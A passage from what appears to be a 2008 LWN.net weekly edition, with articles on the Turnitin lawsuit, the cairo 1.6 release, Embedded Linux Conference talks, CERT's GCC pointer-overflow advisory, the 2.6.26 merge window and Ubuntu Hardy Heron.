is no distribution for profit or any market harm.  


In iParadigm's Counterclaims
[PDF], there were several other causes of action, trying to mold the facts
into a claim of "trespass to chattels" and even claims of violations of
the Computer Fraud and Abuse Act, as well as Virginia's Computer Crimes
Act. Those are serious allegations.  On the first, the assertion was that
the plaintiffs  allegedly used  nyms like 'Rube Goldberg' and
'Perpetual Motion' to improperly file papers in the Turnitin system without
authorization.     
 The court dismissed those counterclaims, pointing out that you have to
prove actual damages and, in the case of trespass to chattels, some
impairment of quality or condition or use.   It's a bit hard to come up
with a dollar figure for how harmed one is by someone's use of a nym. As
for filing the papers without authority, where's the financial harm, the
court asked?   
Trespass to chattels in
meat space is like someone taking your car for a joy ride,  getting into a
fender bender, and then bringing the car back without  fixing the fender or
even filling the gas tank back up.  Not only is the car damaged, but you
didn't have use of it while it was out being driven around, and so you
couldn't drive it to the airport yourself as  you intended and missed your
job interview.  And it's your car, your personal property, which is what chattel
means. 

Like many other legal concepts, it has been applied to digital world, as if
physical property and intellectual property are identical, and in some
ways, it fits.  AOL was an early trailblazer in using trespass to chattels
successfully  against spammers, arguing that the
sheer volume of emails interfered with their being able to use their own
system as intended to service their real customers properly (here's one
example).  

iParadigms also claimed that the terms of their  Usage Policy provided
for indemnification to iParadigm arising out of any use of the Turnitin
website. It also has a user agreement that you are confronted with and must
click "I Agree" to in order to submit papers to Turnitin. The judge made a
distinction between the user agreement and the Usage Policy, however,
noting that there was no "I Agree" to the Usage Policy or any evidence that
the students saw it, and it was  not referenced or incorporated into   the
user agreement.  So he decided that while the students were bound by what
they said "I Agree" to, they never agreed to the Usage Policy. But the
appeal asks whether these minors  ever gave a legally binding assent, since
their "I Agree" was really "My School Says I Have to Agree".  In some
respects, this EULA issue may be as interesting to track as the fair use
questions.

		The Cairo Project reaches a new milestone


The cairo project is producing
a cross-platform universal vector graphics library:


Cairo is a 2D graphics library with support for multiple output devices. Currently supported output targets include the X Window System, Win32, image buffers, PostScript, PDF, and SVG file output. Experimental backends include OpenGL (through glitz), Quartz, and XCB.
Cairo is designed to produce consistent output on all output media while taking advantage of display hardware acceleration when available (eg. through the X Render Extension).


Cairo is used by the GNOME and desktop environment and some
KDE applications.
The Wikipedia
article
on cairo has more background information on the project.
LWN investigated
cairo back in August, 2005 at the time of the 0.9.0 release.
Progress on cairo has been steady since then, with releases coming out
frequently.

<!-- LWNPutAdHere -->

Major version 1.6.0 of cairo was recently
announced:


This is a major update to cairo, with new
features and enhanced functionality which maintains compatibility for
applications written using cairo 1.4, 1.2, or 1.0. We recommend that
anybody using a previous version of cairo upgrade to cairo 1.6.0.


A list of the major changes in cairo 1.6.X includes:


The pdf generation has been greatly improved, the number of rasterized image fallbacks has been greatly reduced.
 The PostScript and PDF output code have had a number of efficiency and portability improvements. The pixman library has been split out so that it can be shared by cairo and the X server.
 Cairo 1.6.X now supports arbitrary X trueColor and 8-bit PseudoColor visuals. The Mac OS X Quartz backend is now an official part of cairo and the API has been stabilized.
 A new win32 printing backend has been added.
 There have been a number of minor API additions to cairo.
 Numerous "robustness fixes" have been added.
 Other enhancements and bug fixes have been added.


As is typical with major releases, several bug fix releases quickly
followed.  The first was
version 1.6.2
which addressed a problem with certain PostScript printers.
That was followed by
version 1.6.4:
"The cairo community is wildly embarrassed to announce the 1.6.4
release of the cairo graphics library. This release reverts the xlib
locking change introduced in 1.6.[2], (and the application crashes that
it caused)."  Hopefully the code will now stabilize and be
adopted by the upstream applications.


Congratulations go out to Carl Worth and the other cairo developers
for this major release and their continued work on this important project.


		ELC: Trends in embedded Linux


Henry Kingman, editor of LinuxDevices, opened the  
Embedded Linux Conference 
with a look at the trends in embedded development since he started covering
the subject in 1999.  Based largely on the annual surveys run by LinuxDevices,
his keynote speech highlighted the growth of Linux as an embedded operating
system as well as where it is headed in the next few years. 


The conference, which started April 15 in Mountain View,
California, gathers around 175 embedded developers for three days of talks
on a wide variety of embedded topics.  Sponsored by the 
Consumer Electronics Linux Forum 
(CELF), the conference has become the premier technical conference for the
ever-growing embedded Linux community.  Each day has a keynote, with
kernel hacker Andrew Morton and CELF architecture group chair (and 
conference organizer) Tim Bird rounding those out, followed by a half-dozen
presentations slots, with three parallel presentations.


Bird introduced Kingman as one of the main providers of news about embedded
Linux, relating that LinuxDevices and LWN.net are his "two main sources of
information" about the community.  Bird marveled at the body of work that
Kingman has amassed: "this guy is prolific".  He also reminisced a bit about
the early days of embedded Linux, starting with his days at Lineo to his 
current work at Sony:

It was hard to get people to pay attention to Linux, now Sony is putting
Linux into almost everything.


Kingman acknowledged Bird's introduction, but said that he didn't know
"if that makes me an expert in the forest, or lost in the trees".
He looked back to a 1999 San Francisco Bay Linux Users Group meeting
with Linus Torvalds as the featured speaker.  Kingman said that Torvalds
wanted Linux to be a desktop operating system but that he saw the embedded
space as the big growth area.  


Later that year, Kingman attended the first
LinuxWorld conference where he saw some folks from Transmeta talking about
squashfs and cramfs.  An article he wrote about those filesystems was
published by Rick Lehrbaum, founder
of LinuxDevices.  That was the first of more than 3000 articles
Kingman has since written for LinuxDevices.


Kingman then presented the results of the most recent 
LinuxDevices
reader survey.  The survey gathers information about what LinuxDevices 
readers are doing or planning with regard to embedded Linux development.  It
has been run for eight years, providing some interesting information on changes
in the readers' attitudes over the years.


Usage of Linux in embedded development projects crossed a threshold this year,
with more than 50% of the 812 respondents saying that they are currently
using it.  Usage of Linux has been 
growing year over year, but didn't cross the halfway mark until 2008.  More
than 61% believed their company would be using Linux within the next two years.


The ARM family of processors has continued its growth with 30% of the readers
using it, while 25% are using x86 variants.  ARM overtook x86 three years ago;
that trend looks to be continuing with respondents seeing 31% ARM versus 
23% x86 over the next two years.  Kingman said that he thinks Intel is
trying to reverse that trend because spending on consumer devices is predicted
to "outstrip IT spending".

 There were a couple of questions asking where respondents obtain the
version of Linux they use in their products.  Ubuntu has a somewhat
surprising share at 8%.  For a relatively new distribution that is not
specifically targeted at that market, it stands out, as does its predicted
growth to 10% over the next two years.  Kernel.org at 16% and Debian at 14%
are the leading sources, with uClinux tied with Ubuntu and MontaVista and
Fedora at 6% each.


Unsurprisingly, per-unit royalties were not popular with two-thirds of 
respondents being unwilling to pay those, but 60% were willing to pay for
development and support of embedded Linux, so it is not just the free-beer
aspect that is drawing companies to Linux.  Most (45%) get their sources as a 
free download from a community site like kernel.org or handhelds.org, with
18% getting them bundled with their hardware.  Only 11% said that cost was 
the greatest influence on their choice.


Legal threats are still on the minds of some, with copyright or patent 
concerns being considered a significant threat to roughly half of the
respondents.  SCO has fallen off the radar, with only 2.5% thinking that it
is still a threat.  "None of the above" was the big winner, presumably
meaning that there are no significant threats, at 40%.


Kingman finished with a request of the embedded community to let him know
what things should be covered in more depth and any additional areas they
wish to see covered.  He is looking for input on what the community wants
to talk about: "we want to be your website."


		GCC and pointer overflows


On April 4, CERT put out a
scary advisory about the GNU Compiler Collection (GCC).  This advisory
raises some interesting issues on when such advisories are appropriate,
what programmers must do to write secure code, and whether compilers should
perform optimizations which could open up security holes in poorly-written
code. 

In summary, the advisory states:


	Some versions of gcc may silently discard certain checks for
	overflow. Applications compiled with these versions of gcc may be
	vulnerable to buffer overflows. [...]
	
	Application developers and vendors of large codebases that cannot
	be audited for use of the defective length checks are urged to
	avoiding [sic] the use of gcc versions 4.2 and later.


This advisory has disappointed a number of GCC developers, who feel that
their project has been singled out in an unfair way.  But the core issue is
one that C programmers should be aware of, so a closer look is called for.

To understand this issue, consider the following code fragment:


Here, the programmer is trying to ensure that len (which might
come from an untrusted source) fits within the range of buffer.
There is a problem, though, in that if len is very large, the
addition could cause an overflow, yielding a pointer value which is less
than buffer.  So a more diligent programmer might check for that case
by changing the code to read:


This code should catch all cases; ensuring that len is within
range.  There is only one little problem: recent versions of GCC will
optimize out the second test (returning the if statement to the
first form shown above), making overflows possible again.  So any code
which relies upon this kind of test may, in fact, become vulnerable to a
buffer overflow attack.

This behavior is allowed by the C standard, which states that, in a correct
program, pointer addition will not yield a pointer value outside of the
same object.  So the compiler can assume that the test for
overflow is always false and may thus be eliminated from the expression.  It
turns out that GCC is not alone in taking advantage of this fact: some
research by GCC developers turned up other compilers (including PathScale,
xlC, LLVM, TI Code Composer Studio, and Microsoft Visual C++ 2005) which
perform the same optimization.  So it seems that the GCC developers have a
legitimate reason to be upset: CERT would appear to be telling people to
avoid their compiler in favor of others - which do exactly the same thing.

The right solution to the problem, of course, is to write code which
complies with the C standard.  In this case, rather than doing pointer
comparisons, the programmer should simply write something like:


There can be no doubt, though, that incorrectly-written code exists.  So
the addition of this optimization to GCC 4.2 may cause that bad code to
open up a vulnerability which was not there before.  Given that, one might
question whether the optimization is worth it.  In response to a statement
(from CERT) that, in the interest of security, overflow tests should not be
optimized away, Florian Weimer said:


	I don't think this is reasonable.  If you use GCC and its C
	frontend, you want performance, not security.  After all, the real
	issue is not the missing comparison instruction, but the fact that
	this might lead to subsequent unwanted code execution.  There are C
	implementations that run more or less unmodified C code in an
	environment which can detect such misuse, but they come at a
	performance cost few are willing to pay.


Joe Buck added:


	Furthermore, there are a number of competitors to GCC.  These
	competitors do not advertise better security than GCC.  Instead
	they claim better performance (though such claims should be taken
	with a grain of salt).  To achieve high performance, it is
	necessary to take advantage of all of the opportunities for
	optimization that the C language standard permits.


It is clear that the GCC developers see their incentives as strongly
pushing toward more aggressive optimization.  That kind of optimization
often must assume that programs are written correctly; otherwise the
compiler is unable to remove code which, in a correctly-written
(standard-compliant) program, is unnecessary.  So the removal of pointer
overflow checks seems unlikely to go away, though it appears that some new warnings will be added to alert
programmers to potentially buggy code.  The compiler may not stop
programmers from shooting themselves in the foot, but it can often warn
them that it is about to happen.

		An LWN.net Distribution List update


It's that time of year again -- the time when we look at how the LWN Distributions List has changed over the past
year.  Last year's update can be found here.  At that time the list had 485 "active"
distributions, with an additional 58 listings in the Historical section.
This year the list has grown to 491 active distributions, but down to 56 in
the Historical listing.

We define a historical distribution as one that is no longer under
development, but we leave them on the list as long as there is still code
to be found.  As always, it can be a challenge separating the slow-paced
distributions from the historical ones.  There are, inevitably, some
projects that are still in the active part of the list that have not been
developed in years.  Occasionally historical projects come out with new
releases.  Distributions will be removed from the list if their website
times out repeatedly over a period of time, but that's not the end of it.
Entries are moved to an internal list, where they are rechecked a few more
times.  Sometimes projects come back and are re-added to the list.

In the last year every link on the list has been checked at least once.
Almost half the list has been checked again.  In addition to regular link
checking, new distributions are added and existing entries are updated with
new releases and other information.  We do our best to keep the list
up-to-date.  That said, if you know of distributions that should be added,
or removed, or changed in any way, just let us know.

Now it's time to say goodbye to the distributions that have been removed in
the last year, in no particular order.  Brutalware, Progeny Componentized
Linux, herbix, BeatrIX Linux, Deep-Water/Linux, distccKNOPPIX,
LinuxDefender Live!, LNX-BBC, Mandows, Mediainlinux, RunOnCD, RxLinux,
LinuxInstall.org, Turkix, XoL, Aleph ARMlinux, UltraLinux, epiOS, APAWS
Linux with Gallery, Linux for Windows 9X, Phat Linux, GNU/Linux
TerminalServer for Schools, BSLinux, CAEN Linux, FlightLinux, Laonux,
LibraNet GNU/Linux, Linux in a Pillbox (LIAP), Mastodon, Phlak, PHP
Solutions Live, Sentinix, slimlinux, Snootix, Tunix, uOS, Icepack Linux and
Think BlueLinux.

		ELC: Morton and Saxena on working with the kernel community


In many ways, Andrew Morton's keynote set the tone for this year's Embedded
Linux Conference (ELC) by describing the ways that embedded companies and
developers can work with the kernel community in a way that will be
"mutually beneficial".  Morton provided reasons, from a purely economic
standpoint, why it makes sense for companies to get their code into the
mainline kernel.  He also provided concrete suggestions on how to make that
happen.  The theme of the conference seemed to be "working with the
community" and Morton's speech provided an excellent example of how and why
to do just that.

 Conference organizer Tim Bird introduced the keynote as "the main
event" for ELC, noting that he often thought of Morton as "kind of
like the adult in the room" on linux-kernel.  Readers of that
mailing list tend to get the impression that there's more than one of him
around because of all that he does.  He also noted that it was surprising
to some that Morton has an embedded Linux background—from his work at
Digeo.  

Morton believes that embedded development is underrepresented in
kernel.org work relative to its economic importance.  This is
caused by a number of factors, not least the financial constraints under
which much embedded development is done.  An exceptional case is the chip
and board manufacturers who have a big interest in seeing Linux run well on
their hardware so that they can attract more customers.  But even those do not
contribute as much as he would like to see to kernel development.

 An effect of this underrepresentation is a risk that it will tilt
kernel development more toward the server and desktop.  The kernel team is
already accused of being server-centric, and there is some truth to that,
"but not as much as one might think".  Kernel hackers do care
about the desktop as well as embedded devices, but without an advocate for
embedded concerns, sometimes things get missed.  

Something Morton would like to see is 
a single full-time "embedded maintainer".  That person would serve as the
advocate for embedded concerns, ensuring that they didn't get overlooked in
the process.  An embedded maintainer could
make a significant impact for embedded development.

 Not all kernel contributions need to be code, he said.  There is a need
just to hear the problems that are being faced by the embedded community
along with lists of things that are missing.  "Senior, sophisticated
people" are needed to help prioritize the features that are being
considered as well.  Morton often finds out things he didn't know at
conferences, things that he should have known about much earlier: "That's
bad!" 
 Morton is trying to incite the embedded community to interact with the
kernel hackers more on linux-kernel.  He said that a great way to get the
attention of the team is to come onto the mailing list and make them look
bad.  Unfavorable comparisons to other systems or earlier 
kernels, for example, especially when backed up with numbers, are noticed
quickly.  He said that it is important to remember that the person
who makes the most noise gets the most attention.  
 One of the areas that he is most concerned about is the practice of
"patch hoarding"—holding on to kernel changes as patches without
submitting them upstream to the kernel hackers.  It is hopefully only due
to a lack of resources, but he has heard that some are doing it to try and
gain a competitive advantage.  This is simply wrong, he said, companies
have a "moral if not legal obligation" to submit those
patches.  

[PULL QUOTE: 
The code will be better because of the review done by the kernel
hackers; once it is done, the maintenance cost falls to near zero as well.
He also touted the competitive advantage, noting that getting your code
merged means that you have won—competing proposals won't get
in.
 END QUOTE]


There are many good reasons for getting code merged upstream that Morton
outlined.  The code will be better because of the review done by the kernel
hackers; once it is done, the maintenance cost falls to near zero as well.
He also touted the competitive advantage, noting that getting your code
merged means that you have won—competing proposals won't get
in. Being the first to merge a feature can make it easier on
yourself and harder on your competition.


There are downsides to getting your code upstream as well.  Most of
those stem from not getting code out there early enough for review.  The
kernel developers can ask for significant changes to the code especially
in the area of user space interfaces.  If a company already has lots of
code using the new feature and/or interface, it could be very disruptive;
"sorry, there's no real fix for that except getting your code out
early enough".

 Another downside that companies may run into is with competitors being
brought into the process.  Morton and other kernel hackers will try to find
others who might have a stake in a new feature to get them involved so that
everybody's needs are taken into account.  This can blunt the "win" of
getting your feature merged.  Some are also concerned that competitors will
get access to the code once it has been submitted; "tough luck" Morton
said, everything in the kernel is GPL.  

Morton had specific suggestions for choosing a kernel version to use for an
embedded project.  2.6.24 is not a lot better than 2.4.18 for embedded use,
but it has one important feature: the kernel team will be interested in
bugs in the current kernel.  He suggests starting with the current kernel,
upgrading it while development proceeds, freezing it only when it is time
to ship the product.


He also suggests that a company create an internal kernel team with one or
two people who are the interface to linux-kernel.  This will help with name
recognition on the mailing list, which will in turn get patches submitted
more attention.  Over time, by participating and reviewing others' code,
the interface people will build up "brownie points" that will allow them
to call in favors to get their code reviewed, or to help smooth the path
for inclusion.


The kernel.org developers appear to give free support, generally very good
support, Morton said, but it is not truly free.  Kernel
hackers do it as a "mutually beneficial transaction"; they don't do it to
make more money for your company, they do it to make the kernel better.
Morton is definitely a big part of that, inviting people to email him,
especially if "five minutes of my time can save months of yours".


The decision about when to merge a new feature is hard for some to
understand.  Many consider Linux a dictatorship, which is incorrect, it is
instead "a democracy that doesn't vote".  The merge decision
is made on the model of the "rule of law" with kernel hackers playing the
role of judges.  Unfortunately, there are few written rules.


Some of the factors that go into his decision about a particular feature
are its maintainability, whether there will be an ongoing maintenance team,
as well as the general usefulness of the feature.  Depending on the size of
the feature, an ongoing maintenance team can be the deciding factor.  It is
not so important for a driver, but a new architecture, for example, needs
ongoing maintenance that can only be done by people with knowledge of and
access to the hardware.

 MontaVista kernel hacker, Deepak Saxena, gave a presentation entitled
"Appropriate Community Practices: Social and Technical Advice" later in the
conference that mirrored many of Morton's points.  He showed some examples
of hardware vendors making bad decisions that got shot down by the kernel
developers, mostly because they didn't "release early and release often".
There is a dangerous attitude that "it's Linux, it's open source, I
can do anything I want" which is true, but won't get you far with
the community.  
 Saxena has high regard for the benefits of working with the system:
if your competitor is active in the community, they are getting an
advantage that you aren't.  Like Morton, he believes that some
members of the development team need to get involved in kernel.org
activities. "The community is an extension of your team, your team is
an extension of the community."

 He also has specific advice for hardware vendors: avoid abstraction
layers, recognize that your hardware is not unique, and think beyond the
reference board implementation.  Generalizing your code so that others can
use it will make it much more acceptable, as will talking with the
developers responsible for the subsystems you are touching.  Abstraction
layers may be helpful for hardware vendors trying to support multiple
operating systems, but they make it difficult for the kernel hackers to
understand and maintain the code.  The kernel.org folks are not interested
in finding and fixing bugs in an abstraction layer.  

He also points out additional benefits of getting code merged.  Once it is
in the kernel, the company's team will no longer have to keep up with
kernel releases, updating their patches to follow the latest changes.  The
code will still need to be maintained, but day-to-day changes will be
handled by the kernel.org folks.  An additional benefit is that the code
will be enhanced by various efforts to automatically find bugs in mainline
kernel code with tools like lockdep. 


It is clear that the kernel hackers are making a big effort to not only get
code from the embedded folks, but also some of their expertise.  There are
various outreach efforts to try and get more people involved in the Linux
development process; these two talks are certainly a part of that.  By
making it clear that there are benefits to both parties, they hope to make
an argument that will reach up from engineering to management resulting in
a better kernel for all.


		The 2.6.26 merge window opens


That shiny new 2.6.25 kernel which was released on April 16 is now ancient
history; some 3500 changesets have been merged into the mainline git
repository since then.  Some of the most significant user-visible changes
include:


 New drivers for Korina (IDT rc32434) Ethernet MACs, 
     SuperH MX-G and SH-MobileR2 CPUs,
     Solution Engine SH7721 boards,
     ARM YL9200, Kwikbyte KB9260, Olimex SAM9-L9260, and emQbit ECB_AT91
     boards,
     Digi ns921x processors,
     the Nias Digital SMX crypto engines,
     AMCC PPC460EX evaluation boards,
     Emerson KSI8560 boards,
     Wind River SBC8641D boards,
     Logitech Rumblepad 2 force-feedback devices,
     Renesas SH7760 I2C controllers, and
     SuperH Mobile I2C controllers.


 The PCI subsystem now supports PCI Express Active State Power 
     Management, which can yield significant power savings on suitably
     equipped hardware.

 There is a new security= boot parameter which allows the
     specification of which security module to use if more than one are
     available. 

 Network address translation (NAT) is now supported for the SCTP,
     DCCP, and UDP-Lite protocols.  There is also netfilter connection
     tracking support for DCCP.

 The network stack can now negotiate selective acknowledgments and window
     scaling even when syncookies are in use.

 Another long series of network namespace patches has been merged,
     continuing the long process of making all networking code
     namespace-aware.

 Mesh networking support has been added to the mac80211 layer.  It is
     currently marked "broken," though, until various outstanding issues
     are fixed.

 4K stacks are now the default for the x86 architecture.  This change
     is controversial and could be reversed by the time the final release
     happens. 

 SELinux now supports "permissive types" which allow specific domains
     to run as if SELinux were not present in the system at all.

 A number of enhancements have been made to the realtime group
     scheduler, including multi-level groups, the ability to mix processes
     and groups (and have them compete against each other for CPU time),
     better SMP balancing, and more.

 Support for the running of SunOS and Solaris binaries has been
     removed; it has long been unmaintained and did not work well.

 The kernel now has support for read-only bind mounts, which provide a
     read-only view into an otherwise writable filesystem.  This feature
     (the implementation of which was more involved than one might think)
     is intended for use in containers and other situations where even
     processes running as root should not be able to modify certain
     filesystems. 


Changes visible to kernel developers include:


 At long last, support for the KGDB interactive debugger has been 
     added to the x86 architecture.  There is a DocBook document in the
     Documentation directory which provides an overview on how to use this
     new facility.

 Page attribute table (PAT) support is also (again, at long last)
     available for the x86 architecture.  PATs allow for fine-grained
     control of memory caching behavior with more flexibility than the
     older MTRR feature.  See Documentation/x86/pat.txt for more
     information. 

 Two new functions (inode_getsecid() and
     ipc_getsecid()), added to support security modules and the
     audit code, provide general access to security IDs associated with
     inodes and IPC objects.  A number of superblock-related LSM callbacks
     now take a struct path pointer instead of struct
     nameidata.  There is also a new set of hooks providing
     generic audit support in the security module framework.

 The now-unused ieee80211 software MAC layer has been removed; all of
     the drivers which needed it have been converted to mac80211.  Also
     removed are the sk98lin network driver (in favor of skge) and bcm43xx
     (replaced by b43 and b43legacy).

 The generic semaphores
     patch has been merged.  The semaphore code also has new
     down_killable() and down_timeout() functions.

 The ata_port_operations structure used by libata drivers now
     supports a simple sort of operation inheritance, making it easier to
     write drivers which are "almost like" existing code, but with small
     differences. 

 A new function (ns_to_ktime()) converts a time value in
     nanoseconds to ktime_t.

 The final users of struct class_device have been converted to
     use struct device instead.  If all goes well, the
     class_device structure will be removed later in the 2.6.26
     cycle. 

 Greg Kroah-Hartman is no longer the PCI subsystem maintainer, having
     passed that responsibility on to Jesse Barnes.

 The seq_file code now accepts a return value of SEQ_SKIP from
     the show() callback; that value causes any accumulated output
     from that call to be discarded.


Needless to say, this development series is still young and, as of this
writing, the merge window has over a week to run.  So there will be a lot
more code going into the mainline before the shape of 2.6.26 becomes clear.

		The Grumpy Editor encounters the Hardy Heron


Your editor is not always known for making life easy for himself.  Perhaps
one of the most clear examples of masochistic behavior would be a certain
preference for running development distributions on mission-critical
systems.  That said, your editor has stuck with a stable distribution on
his laptop through a round of intensive travel earlier this year.  But that
was too easy, so, shortly before heading off to the Linux Foundation's
Collaboration Summit, the laptop got moved to the Ubuntu "Hardy Heron"
distribution.  Needless to say, there have been some interesting ups and
downs (literally) since then.


There is always a certain thrill that comes with upgrading a system and finding that
important features no longer work.  In this case, the problem was suspend
and resume, which your editor uses heavily.  In fact, the system would
suspend just fine - as long as one failed to notice that, behind the
cleverly darkened screen, the laptop's backlight had been left on.
Needless to say, this new behavior is not helpful if one's goal is to save
power while the system is suspended, but it gets worse than that.  Your
editor discovered this nice surprise after carrying the computer in a
backpack for a few hours; by the time it came out, it was almost too hot to
hold.  Happily, no permanent damage appears to have been done.


Or, perhaps, unhappily.  Your editor has been looking for an excuse to
get a new laptop for a while.


The problem turned out to be a HAL configuration error combined with a
strange internal model number which makes your editor's Thinkpad X31
different from, seemingly, every other X31 on the planet.  Once your editor
found the bug report and attached a "me too" comment, the solution was
quick in coming.  On the net, one can find complaints that Ubuntu is
unresponsive to bug reports, but that was certainly not the experience
here. 


As an aside, it seems worth noting that life seems to have gotten more
complicated, with a lot more code wrapped around the kernel than there once
was.  The problematic configuration file was
/usr/share/hal/fdi/information/10freedesktop/20-video-quirk-pm-ibm.fdi
- not a place where your editor, who is not a HAL expert, would have
thought to look.  That, it seems, is the price of more capable hardware and
software, but sometimes your editor pines for the days when it seemed
possible to carry a full understanding of the system within a single brain.


GNOME developers are (perhaps unjustly in recent years) known for taking a
minimal approach to configuration options.  That can be irritating, but
just as annoying is their tendency to reset the options they do provide
over major updates.  Once suspend and resume work, your editor demands
something else of a laptop when traveling: absolute silence.  So the return
of beeps to gnome-terminal was not appreciated.  Those were easily silenced,
but the GNOME developers also saw fit to bring back the blinking cursor -
and they took away the configuration option which abolishes that
intolerable feature.


Your editor first ran into the unstoppable blink with Rawhide; a query to
the developers there turned up a quick answer.  It seems that the GNOME
developers have decided to create a single, system-wide parameter to
control blinking cursors.  Now, your editor approves of the concept of
being able to turn off that behavior everywhere with a single switch - but
only as long as that switch isn't hidden where nobody will ever find it.
In this case, the GNOME developers have taken this feature, wrapped it in
old newspapers, and stashed it behind the furnace in the basement; then
they put a trunk on top of it.  It is a
rare user who will find it unassisted.  In the hopes that it may save
one or two readers from some time spent with search engine, your editor
will now divulge the top-secret incantation which turns blinking cursors
off:


Naturally, a terminal window is required to run this command.  It would
have been nice if the developers who packaged this code for Hardy Heron had
found a way to smooth over this change, but no such luck; as far as your
editor can tell, no distributor has made that effort.

Another bit of fun is that your editor is no longer able to set the desktop
background; the relevant configuration windows are ineffective.  In this
case, it would appear that the task of implementing the user's background
choices have been moved to nautilus - just the place your editor would have
thought to look for it.  As it happens, your editor has no use for file
managers and does not run nautilus - and is punished with an immutable
Ubuntu-brown background for that sin.  Happily, your editor still knows how
to run xsetroot.


All of the above is a set of relatively minor grumbles, all of which are
rectified in relatively short order.  Once those details have been taken
care of, the Hardy Heron release works quite well.  One of the biggest
aggravations from previous upgrades - having OpenOffice.org reformat the
slides in all of your editor's presentations - was not present this time
around.  Hopefully we are moving into an era where "it didn't mangle my
documents" is not something considered worthy of mention.


There was one very nice surprise as well.  Your editor's laptop previously
required almost 12 watts of power when running unplugged.  This laptop is
not at the bleeding edge of current technology, so the amount of time it
was able to run without a recharge has been dropping for a while.  With the
Hardy release, steady-state power consumption has dropped to just over
9 watts - a big improvement.  The credit for this change belongs to
developers at all levels: kernel, applications, distributors, etc.  The end
result is a system which runs much more efficiently, and that is a good
thing.


All told, your editor is reasonably content; this distribution looks
like one which might just be worth keeping around.  That's a good thing,
since Ubuntu plans to maintain it as a "long-term support" release.  Not
that your editor intends to make much use of that long-term support; there
should be a new development series starting soon, after all.  One of
the nice things about development distributions is that support
never ends as long as one stays on the treadmill and the project
itself remains alive.

		ELC: A taste of the conference


Technical conferences generally provide a wealth of choices, to the point
where participants have to make tough decisions at times to pick the session
to sit in on.  This year's Embedded Linux
Conference was no exception; there were multiple slots where the author
had to wish that he could be in more than one place at a time.  But, he did
manage 
to take notes in some of those that he attended; hopefully some of the
conference flavor can come through in the following report.

Power management
 MontaVista's Kevin Hilman presented an approach for
handling power management on embedded devices that focused on changes that
can be made to the kernel, but noted that there is much that can be done by
applications too.  Because of
the time and money budgets available for embedded projects, many do not
have the resources to do a complete job of tuning the kernel to get the
best possible power performance.  There is also no "one size fits all" solution
for power management, there are too many device-specific issues to allow that.

 Hilman's approach is to target specific "building blocks" that embedded
developers can incorporate into their project.  Each block will provide
some savings, so the project can stop when the desired performance is
reached—or it is time to ship the device.  One of the easier steps is
to customize the idle loop in the kernel, putting the processor to sleep
when there is no work to be done.  There are different kinds of sleep,
though, generally trading off power savings and wakeup latency.  The
cpuidle subsystem provides a means to specify those values in an
architecture independent way, which, along with a platform independent
"governor", can put the processor into various sleep modes.  The only
platform dependent piece are the hooks to enter each of the different sleep
states.  

A similar approach is taken by the CPUfreq subsystem, which can reduce the
clock frequency of the CPU to reduce power consumption using the Dynamic
Voltage and Frequency Scaling (DVFS) feature of some processors.
"Operating points" (OPs)—voltage and frequency tuples—are defined for the
hardware.  There are
various generic CPUfreq governors that can then be used to determine when
to change OPs and which to change to.  The governor will invoke a
platform-specific driver to effect that change.  In addition, power
management "quality of service" is currently being discussed to allow
applications to request a certain level of performance that may override
some of the lower-level sleep or frequency decisions.

Embedded SELinux
 SELinux has a well-earned reputation for being able to restrict
processes to only use those resources that have been specifically allowed
by policy, but it is rather resource intensive.  Yuichi Nakamura presented
Hitachi's research into bringing SELinux into a more resource constrained
embedded environment.  One of the first problems they encountered was the
need for flash filesystems that support extended attributes (xattrs),
which is where SELinux stores labels for files.  Only jffs2 currently
supports xattrs, so that is the one they used.  

The next big hurdle was trying to get a set of policies that were stripped
down to the needs of an embedded platform.  Nakamura started with the
SELinux reference policy (refpolicy) and started removing rules.  The sheer
number of rules and policies that needed to be removed was
daunting—as was the need to understand what was being removed.
He also ran into strange dependencies: removing a sendmail policy caused a
problem in the apache rules.  The solution was to create a simplified
policy language and policy
editor that reduced the problem to something more tractable for the
embedded world.  In the process it greatly reduced the size of the policy
files, from 4.6M down to 60K.


Another problem encountered was the performance and size of
SELinux, which is a common embedded woe.  Through some hand optimization of
the read/write path, along with removing some unused permissions checks,
they were able to increase the performance by a factor of ten on their
SuperH reference platform.  By changing some static buffers in SELinux to a
dynamic allocation they also saved 250K of runtime memory.  Much of that
work was merged into 2.6.24.
There is still
work to be done, but with the changes, SELinux is viable for embedded
platforms. 

GCC and kernel hacking

Two sessions provided various tips and tricks for embedded development,
with Gene Sally of Timesys focused on GCC, while IBM's Hugh Blemings shared
some of the things he has learned from the kernel hackers he works with. 


Sally discussed the different ways that developers could get a GCC
toolchain for their target processor.  One of the bigger hurdles that an
embedded developer faces is getting a cross-compiler toolchain—one
that runs on his development workstation, but generates code for the target
platform.  There are several ways to get the toolchain: as a tarball for
popular development/target combinations, by using helper tools like crosstool or buildroot from uClibc, or by
building it from source directly.


Building from source is the most difficult, of course, but allows for the
most customizations and flexibility.  Sally went on to describe a handful
of useful GCC command-line options for helping to debug cross-compilers or
just to better understand what GCC is doing:

gcc -### - show what GCC would have executed
gcc -v - show what GCC is executing
gcc -g x.c -o x; objdump -S x - show the C and generated
assembly code
gcc -E -dM - &lt;/dev/null - show all predefined GCC macros
gcc -C -E - show pre-processor output, but leave comments intact
gcc -M - show all include file dependencies (for use in Makefiles)
gcc -MM - like above, but ignore system include files


Blemings concentrated on the development infrastructure by describing the
lab that he used to port the kernel to a Taishan PowerPC-based evaluation
board.  When undertaking a project like that, "get to know your hardware
team" because they will have lots of important information and shortcuts
that can be used as part of the board "bringup".  At IBM in Canberra, where
Blemings is based, they have gotten to the point where they can bring up
Linux on any board where they can "access memory and point the PC [program
counter] at it"; his tips have come out of that environment.


One of the most important things is to realize that you will be building
kernels over and over again, so optimizing your environment for that will
save lots of time.  His suggestion was to start with a "honkin'" compile
box; he described an IBM multi-processor box as an excellent choice but noted
that the cost was so high he couldn't get one.  It would, however, do
"3k/sec"—that's compile 3 kernels per second.  In the absence of
something like that, he suggested borrowing cycles by using ccache and distcc to reduce and parallelize the
compilation that needs to be done.  Even adding relatively modest machines
into the distcc pool can significantly reduce time spent waiting for a new
kernel. 

Ubuntu mobile and embedded (UME) and Maemo

One of the hottest areas in embedded Linux these days is the mobile
internet device (MID) market.  There were two talks on MID-focused
distributions, with Canonical's David Mandala giving an overview of Ubuntu
Mobile and Embedded (UME) and Nokia's Kate Alhola talking about the status
and future directions of Maemo Mobile Linux.  UME is a relatively recent
addition to the mobile device space—they are anxiously awaiting
hardware to run on—whereas Maemo has been around for a while,
powering the Nokia N770, N800, and N810 internet tablets.


UME is an effort to apply the Ubuntu distribution and philosophy to
touchscreen devices.  Mandala explained that they are taking existing Linux
applications and adapting them for small screens that use fingers, rather
